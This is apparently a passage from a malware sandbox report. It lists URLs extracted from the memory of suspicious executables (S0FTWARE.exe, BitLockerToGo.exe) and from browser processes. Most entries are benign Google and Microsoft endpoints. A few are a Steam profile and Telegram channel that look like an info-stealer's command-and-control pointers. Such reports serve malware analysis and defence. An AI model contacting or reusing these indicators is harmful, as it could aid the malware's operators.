                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                        Source: chrome.exe, 00000005.00000003.2676112600.000007C001898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                        Source: chrome.exe, 00000005.00000003.2676112600.000007C001898000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                        Source: chrome.exe, 00000005.00000002.2749169574.0000331800237000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2751360539.0000331800904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard3
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                        Source: chrome.exe, 00000005.00000002.2751360539.0000331800904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                        Source: chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                        Source: chrome.exe, 00000005.00000002.2732762663.000007C00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686584935.000007C001CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686757739.000007C001D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                        Source: chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                        Source: chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2658567943.000007C000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                        Source: chrome.exe, 00000005.00000003.2642824115.000033180071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                        Source: chrome.exe, 00000005.00000003.2643523370.000033180087C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2751278599.00003318008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                        Source: chrome.exe, 00000005.00000003.2642960372.0000331800728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                        Source: chrome.exe, 00000005.00000002.2751469284.0000331800920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
                        Source: chrome.exe, 00000005.00000002.2751278599.00003318008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                        Source: chrome.exe, 00000005.00000002.2742895899.000007C001690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731121904.000007C00011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                        Source: chrome.exe, 00000005.00000002.2732762663.000007C00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686584935.000007C001CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686757739.000007C001D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731121904.000007C00011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738139914.000007C000CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742297584.000007C00140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                        Source: chrome.exe, 00000005.00000002.2736924847.000007C000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp0
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731121904.000007C00011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731121904.000007C00011C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742527483.000007C0015AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734122101.000007C0006B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2742297584.000007C00140C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                        Source: BitLockerToGo.exe, 00000003.00000002.3364939118.000000001DFF6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3376990744.000000003BD2B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3367821506.0000000023F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
                        Source: msedge.exe, 00000009.00000002.2830539762.00007CF000394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                        Source: msedge.exe, 00000009.00000002.2830539762.00007CF000394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                        Source: chrome.exe, 00000005.00000002.2733051632.000007C000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734639165.000007C00075C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2740760153.000007C001048000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                        Source: chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739984141.000007C000F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732932489.000007C0004A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                        Source: chrome.exe, 00000005.00000002.2739984141.000007C000F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyf
                        Source: chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739984141.000007C000F54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732932489.000007C0004A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                        Source: chrome.exe, 00000005.00000002.2739984141.000007C000F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                        Source: chrome.exe, 00000005.00000002.2733766501.000007C000628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732932489.000007C0004A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                        Source: chrome.exe, 00000005.00000003.2654430117.000007C000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736405653.000007C0009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                        Source: chrome.exe, 00000005.00000002.2731576572.000007C00020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                        Source: msedge.exe, 00000009.00000002.2830539762.00007CF000394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                        Source: chrome.exe, 00000005.00000002.2738808629.000007C000D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyn
                        Source: chrome.exe, 00000005.00000002.2740984275.000007C0010E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                        Source: chrome.exe, 00000005.00000003.2686421480.000007C001D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2685697337.000007C001D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                        Source: chrome.exe, 00000005.00000002.2739593338.000007C000EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738848259.000007C000DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2652426241.000007C000788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                        Source: chrome.exe, 00000005.00000002.2739449463.000007C000E78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737584077.000007C000B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2737657746.000007C000BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739533324.000007C000E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2652426241.000007C000788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                        Source: chrome.exe, 00000005.00000002.2739593338.000007C000EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2652426241.000007C000788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                        Source: chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739533324.000007C000E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                        Source: chrome.exe, 00000005.00000002.2740637909.000007C001021000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739593338.000007C000EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2652426241.000007C000788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                        Source: chrome.exe, 00000005.00000002.2740637909.000007C001021000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739593338.000007C000EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739533324.000007C000E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2652426241.000007C000788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2731848646.000007C0002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                        Source: chrome.exe, 00000005.00000002.2740637909.000007C001021000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739593338.000007C000EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738970737.000007C000DCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2738848259.000007C000DA4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739533324.000007C000E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2652426241.000007C000788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                        Source: chrome.exe, 00000005.00000002.2737584077.000007C000B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2739533324.000007C000E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2652426241.000007C000788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                        Source: chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                        Source: msedge.exe, 00000009.00000003.2766795323.00007CF000264000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.2767180241.00007CF00026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                        Source: chrome.exe, 00000005.00000003.2654430117.000007C000FE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2736405653.000007C0009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                        Source: chrome.exe, 00000005.00000003.2657579203.000007C00043C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657913534.000007C00120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2657711015.000007C001110000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                        Source: chrome.exe, 00000005.00000002.2736405653.000007C0009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2654311777.000007C000F24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                        Source: chrome.exe, 00000005.00000002.2730898591.000007C0000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                        Source: chrome.exe, 00000005.00000002.2730718664.000007C000058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                        Source: BitLockerToGo.exe, 00000003.00000002.3359198623.0000000003195000.00000004.00000020.00020000.00000000.sdmp, AAFIJKKEHJ.exe, 00000014.00000003.3288077663.000001C489480000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                        Source: chrome.exe, 00000005.00000002.2731495740.000007C0001D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                        Source: chrome.exe, 00000005.00000003.2675421936.000007C0012E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                        Source: chrome.exe, 00000005.00000002.2740880213.000007C0010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2734862905.000007C0007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000002.2732973511.000007C0004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                        Source: chrome.exe, 00000005.00000002.2734911429.000007C0007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactionsA
                        Source: chrome.exe, 00000005.00000002.2732518022.000007C0003F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                        Source: chrome.exe, 00000005.00000002.2732762663.000007C00040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686584935.000007C001CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686757739.000007C001D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.2686922583.000007C001DBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199801589826
                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199801589826r08etMozilla/5.0
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: BitLockerToGo.exe, 00000003.00000003.3053644888.000000001DF04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                        Source: S0FTWARE.exe, 00000000.00000002.2246034055.0000000012FC4000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2193253701.0000000012FC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/
                        Source: S0FTWARE.exe, 00000000.00000002.2237517931.0000000012C28000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/09AZaz
                        Source: S0FTWARE.exe, 00000000.00000002.2246034055.0000000012FC4000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2193253701.0000000012FC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.co/https://t.co/GetCursorPos
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/$;
                        Source: S0FTWARE.exe, 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, S0FTWARE.exe, 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000003.00000002.3357757392.0000000002A64000.00000040.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2482726756.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2464873825.0000000002E90000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2512683354.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2464873825.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2542381129.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2497975928.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2527471317.0000000002E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbk
                        Source: BitLockerToGo.exe, 00000003.00000002.3358442703.0000000002E5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/m07mbkW/
